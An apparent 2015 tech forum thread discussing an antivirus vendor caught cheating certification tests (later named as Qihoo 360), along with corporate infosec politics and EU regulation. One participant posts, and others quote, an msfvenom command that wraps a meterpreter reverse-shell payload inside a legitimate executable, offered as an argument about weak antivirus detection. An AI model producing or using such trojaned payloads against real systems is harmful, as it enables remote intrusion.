Hey MR AV scan,.. whats that your hiding ???

dbit

Jesus hope my employer isn't on this list once revealed

https://grahamcluley.com/2015/04/anti-virus-cheat/

dbit

Kaspersky, Fire-eye who done it ?

BoB_BoT

Can't imagine it being Kaspersky, too much to lose caught at that. Would seriously tarnish their reputation.

Saying that, it would tarnish anyone's reputation, I'm also intrigued who it is.

dbit

BoB_BoT wrote: »

Can't imagine it being Kaspersky, too much to lose caught at that. Would seriously tarnish their reputation.

Saying that, it would tarnish anyone's reputation, I'm also intrigued who it is.

Ive signed up to the facebook page or liked it lols . rubbing hands in anticipation.

dbit

Its Curtains for whoever has breached this level of trust no doubt.

Kinet1c

dbit wrote: »

Its Curtains for whoever has breached this level of trust no doubt.

It's not. Average joe that buys AV will still have norton/mcafee pushed on them by their PC sales person and corporations will buy from whoever gives them the best deal, both under and over the table.

dbit

I would not be so sure in the corporate world - Infosec staff will have this hot on the lips and banish the product if in use , If it was me i know I would .

Kinet1c

dbit wrote: »

I would not be so sure in the corporate world - Infosec staff will have this hot on the lips and banish the product if in use , If it was me i know I would .

Infosec often have their hands tied. I worked for a firm with 50k people, everything going well with a particular vendor only for some big wig signing them up to a deal with a lesser product. Infosec had to eat it and deal with all the bugs/issues it caused with the very customised windows build.

dbit

Kinet1c wrote: »

Infosec often have their hands tied. I worked for a firm with 50k people, everything going well with a particular vendor only for some big wig signing them up to a deal with a lesser product. Infosec had to eat it and deal with all the bugs/issues it caused with the very customised windows build.

totally agree, However buggy software , and staff struggling never seems to peter up the chain possibly due to some back handers, Great deals, Offers they cannot refuse and so on . But blatant lying and duping certification tests would see me leaving a firm if they didn't refuse to get rid of the product. ( Personally speaking i cannot speak for the masses)

ITs the worst possible thing an AV suite can do is to modify its download package after certification was done . Falsifying results and changing the end product as per the test criteria .

Blowfish

dbit wrote: »

totally agree, However buggy software , and staff struggling never seems to peter up the chain possibly due to some back handers, Great deals, Offers they cannot refuse and so on . But blatant lying and duping certification tests would see me leaving a firm if they didn't refuse to get rid of the product. ( Personally speaking i cannot speak for the masses)

ITs the worst possible thing an AV suite can do is to modify its download package after certification was done . Falsifying results and changing the end product as per the test criteria .

I wouldn't rate that as anywhere near the worst thing an AV suite can do. I mean lets be realistic here, most AV (yes, including the one you work for) is pretty terrible at it's job and can be bypassed by anyone half decent given 2 minutes with Metasploit, nevermind the fact that a fair few have been shown to have vulnerabilities of their own.

Leaving a company over them refusing to change vendor seems a fair bit ott given the product just isn't that effective anyway.

dbit

Well my area is in the cloud sector and metasploit doesn't even come close to undoing the hardening we employ on cloud platform solution , yes if you study any one product long enough then you can engineer a way to defunc the family in use, certainly is not going to only require a 2 min time-frame that's not very realistic in my eyes.

If i am top level admin and i employ a solution and pay for it to do X, Y and Z and it skips X then i **** it out simple as that.

Blowfish

dbit wrote: »

Well my area is in the cloud sector and metasploit doesn't even come close to undoing the hardening we employ on cloud platform solution , yes if you study any one product long enough then you can engineer a way to defunc the family in use, certainly is not going to only require a 2 min time-frame that's not very realistic in my eyes.

Here's a one liner from Metasploit that pops a reverse shell and bypasses around 50% of AV:

msfvenom -p windows/meterpreter/reverse_http -f exe LHOST=<ip> LPORT=80 -x /root/Desktop/MalwareTest/kix32.exe >> PerfectlyInnocentFile.exe

If I could be bothered encoding/obfuscating it or using a less obvious payload, it'd be higher.

dbit

Blowfish wrote: »

Here's a one liner from Metasploit that pops a reverse shell and bypasses around 50% of AV:

msfvenom -p windows/meterpreter/reverse_http -f exe LHOST=<ip> LPORT=80 -x /root/Desktop/MalwareTest/kix32.exe >> PerfectlyInnocentFile.exe

If I could be bothered encoding/obfuscating it or using a less obvious payload, it'd be higher.

Ammmmm, how exactly does that attack an agent-less protected stack with virtual appliance , I fail to see how the hardening has been downgraded in kernel on a remote stack that is not even installed upon the guest ?? your payload would be nailed by our intrusion prevention rules on first run .

I take it that's is only for a native client onboard , as when i run it in kali MS it does nothing to the protection. Try targeting the deep security solution and let me know how quickly you nerf the protection.

Yes its most likely a win for AV installed guests but cloud and the sector are coming up with more advanced ways to protect the entire solution . Deep sec is written in close proxy to the kernels used in vmware and is designed and written to go hand in hand with VMkernel NSX and VCNS stack.


That MS script/command doesn't prove to me that you have broken the product , defunct the agent-less , penetrated the ips rules or even rendered the guest unprotected.

dbit

as per the script it looks to me the guest would already be in a vulnerable state msfvenom -p windows/meterpreter/reverse_http -f exe LHOST=<ip> LPORT=80 -x /root/Desktop/MalwareTest/kix32.exe >> PerfectlyInnocentFile.exe



The remote target has to be listening on port 80 ??? why would anyone let the cloud VM's listen on port 80 without some from of firewalling ? not a real test for cloud im thinking.

Its also calling Lhost ? how that going to target a remote ip ?. to run that you would have to be on the guest itself and if thats the case there is a bigger picture issue in play.

Blowfish

I think you need to take a step back a bit. AV-comparitives is primarily used for comparing consumer/client level AV. i.e. how good are they at picking up on malicious executable code. My example just showed that this is something AV isn't particularly good at if in a single command I can create a malicious exe that over half of them miss.

dbit wrote: »

The remote target has to be listening on port 80 ??? why would anyone let the cloud VM's listen on port 80 without some from of firewalling ? not a real test for cloud im thinking.

It's a reverse shell, so it creates an outbound connection on port 80. It was used out of simplicity.

dbit

Blowfish wrote: »

I think you need to take a step back a bit. AV-comparitives is primarily used for comparing consumer/client level AV. i.e. how good are they at picking up on malicious executable code. My example just showed that this is something AV isn't particularly good at if in a single command I can create a malicious exe that over half of them miss.
It's a reverse shell, so it creates an outbound connection on port 80. It was used out of simplicity.

Well i did state my sector is cloud and thus i was banging on in the area of which i specialize. We dont opt for the standard AV solution in cloud as that requires more when global banks are firing out VM's at a ferocious rate and need quick stand up of baseline protection on large scale . To attack this bitch you need to spend a hell of a lot longer than 2 mins.

dbit

Getting back on topic , ........... The Testing group have now collaborated with other testing houses, and had a conference call today. they are now joining forces to compare test results and ensure its not a missfire.

What i take from the previous posts is that there are some Irish admins who wont even bat an eye at this and that is one of the biggest problems with infosec and admins in this country in particular . They wont even try to persuade the customer on the back of this news as per the suggestion that they wont listen for whatever mundane reason , if we dont speak, they cannot hear.

syklops

Kinet1c wrote: »

Infosec often have their hands tied. I worked for a firm with 50k people, everything going well with a particular vendor only for some big wig signing them up to a deal with a lesser product. Infosec had to eat it and deal with all the bugs/issues it caused with the very customised windows build.

This times a thousand. I was responding to an incident and needed data from the AV. It was severely lacking. I asked IT why did we pick this particular product. IT responded, "The COO made the decision". The COO was so clued up in technology that if you turned his mouse up side down, he would ring IT complaining it wasn't working. The wrong guy to select the AV product. In another organisation they had bought a web filter. Actually a sales executive had bought it during a round of golf and they felt they should deploy it.

The InfoSec team has the power to save the company the most money of all the teams in a company but they very rarely have any executive representation and so get ignored or shouted down all the time.

dbit

Hi again Syklops , And as per our last discussion on the new EU regulations coming in the pipeline and referring to the "Infosec officer" that role will no longer be able to be filled with that type of person (Lolly gagging golf course chaser) , they will be required to hold some form of security qualification that is inline with the operations and will be held accountable for the decisions made or not made by that firm.

The infosec officer will be able to make the required decisions and given they will still be hampered by backline management trying to go the "Cheap route" they ultimately will be held accountable under new EU legislation, so that person can ask themselves , do i go cheap ? and face litigation down the road or do I stand up and be counted for his or her defined role for which they spent years training for , spending thousands on .......

If the call was a personal one and up to me i know what i would decide, again any firm that didn't have my back i would walk.

syklops

dbit wrote: »

Hi again Syklops , And as per our last discussion on the new EU regulations coming in the pipeline and referring to the "Infosec officer" that role will no longer be able to be filled with that type of person (Lolly gagging golf course chaser) , they will be required to hold some form of security qualification that is inline with the operations and will be held accountable for the decisions made or not made by that firm.

The infosec officer will be able to make the required decisions and given they will still be hampered by backline management trying to go the "Cheap route" they ultimately will be held accountable under new EU legislation, so that person can ask themselves , do i go cheap ? and face litigation down the road or do I stand up and be counted for his or her defined role for which they spent years training for , spending thousands on .......

If the call was a personal one and up to me i know what i would decide, again any firm that didn't have my back i would walk.

That all looks great on paper. Over in Brussels MEPs like Nessa Childers and Brian Hayes are congratulating themselves for solving the infosec question.

The reality is, the same clueless executives will make the decisions. "Will need a security qualification", means one of them will be sent on a 5 day bootcamp, or an intensive CISSP course. A few hundred G's will be assigned for security technology, so they buy next generation firewalls and top of the line IPS devices and neglect to get some talent in. Then they have an incident, and discover their top of the line kit wasn't configured properly. The firewalls were only logging the last 2 days and the IPS was in detection mode not blocking mode and no-one was looking at logs.

The Data Protection Act come in in 1988 and amended in 2003. Twelve years later we have a single data protection ombudsman with a staff of three and an office in Leitrim or somewhere. They recently gave the Data Protection Office 3 Million, half of which they will spend on a Dublin office and new stationary. My point? This new law, assuming it gets passed will be as toothless and inadequate as previous attempts.

dbit

syklops wrote: »

That all looks great on paper. Over in Brussels MEPs like Nessa Childers and Brian Hayes are congratulating themselves for solving the infosec question.

The reality is, the same clueless executives will make the decisions. "Will need a security qualification", means one of them will be sent on a 5 day bootcamp, or an intensive CISSP course. A few hundred G's will be assigned for security technology, so they buy next generation firewalls and top of the line IPS devices and neglect to get some talent in. Then they have an incident, and discover their top of the line kit wasn't configured properly. The firewalls were only logging the last 2 days and the IPS was in detection mode not blocking mode and no-one was looking at logs.

The Data Protection Act come in in 1988 and amended in 2003. Twelve years later we have a single data protection ombudsman with a staff of three and an office in Leitrim or somewhere. They recently gave the Data Protection Office 3 Million, half of which they will spend on a Dublin office and new stationary. My point? This new law, assuming it gets passed will be as toothless and inadequate as previous attempts.

I hoped not , the truth will be in the breeches for 2015 -2016 timeframe, We ill see if anyone goes down the tubes over the back breaking penalties enforced by these new laws . I agree again with most of that and i am hoping that this will take a u-turn and see real accountability take its place at the table , i cant think of any other way to install the "fear of god", in companies who let infosec flail about like a broken arm on a deaf dumb mute skydiver .

Blowfish

dbit wrote: »

What i take from the previous posts is that there are some Irish admins who wont even bat an eye at this and that is one of the biggest problems with infosec and admins in this country in particular . They wont even try to persuade the customer on the back of this news as per the suggestion that they wont listen for whatever mundane reason , if we dont speak, they cannot hear.

Honestly for me it's not that this isn't an issue, in an ideal world it'd certainly factor in the decision of what vendor to go for.

In the real world however, there are a myriad of other factors which can get in the way, some of which have been highlighted above. If there's one thing you learn from blue teaming it's to pick your battles and unfortunately for lots of people this battle (if applicable) would be one that would be a lot of effort for very little real world gain.

dbit

Personally i think the directives are a scapegoat to be able turn massive payouts back on the offending firm/company for data loss . Aggressive but effective is what im reading from all of it. Effectiveness will only start to be evident once convictions are delivered on the back of these laws. Industry grimaces and winces at those types of reports and if main stay and in the public eye which again these directives are forcing disclosure of breech within 24 hours, or else FINES.

Its the nature of the beast, Now to try to scare companies into being top level , but with only 3 employees (no way for that to be proactive only reactive) in IRL(/EU) then the inadequacies will only come to light once convictions breeches have already occurred . Who are the beneficiary's of the payouts ? the victims - surely not ? is it all just a hand rubbing session and a new way for EU to rip money out of the hands of badly deployed infosec houses ???

Kinet1c

dbit wrote: »

Getting back on topic , ........... The Testing group have now collaborated with other testing houses, and had a conference call today. they are now joining forces to compare test results and ensure its not a missfire.

Really should've done this before posting link bait to their web/facebook pages.

syklops

Kinet1c wrote: »

Really should've done this before posting link bait to their web/facebook pages.

Yeah. A facebook page? Really?

dbit

syklops wrote: »

Yeah. A facebook page? Really?

I thought the same thing but hey there ya go . See the first post on the webpage they link you to it .ITs public so it can be viewed without logging in , presuming you don't use facebook.

dbit

Kinet1c wrote: »

Really should've done this before posting link bait to their web/facebook pages.

Agh shure you know me, if they are wrong I'll prolly burn down all they're houses and block they're web page on every proxy i ever touch in future . lolz.

A pestilence upon the wrong doers who do not conform to the way things should be done .

Great vengeance and furious anger and all .

timmywex

And the results are in....

Qihoo has been stripped of certification. A chineese AV provider, I'm sure its not the only dodgy practice they have going on :pac:

dbit

timmywex wrote: »

And the results are in....

Qihoo has been stripped of certification. A chineese AV provider, I'm sure its not the only dodgy practice they have going on :pac:

WE HAAAAAVE A WIIIINNEEERRRR DING DING DING !!! lols.

dbit

And now the after math where they explain why it happened , .........
http://blog.360totalsecurity.com/en/qihoo-360-statement-regarding-cheating-in-lab-test/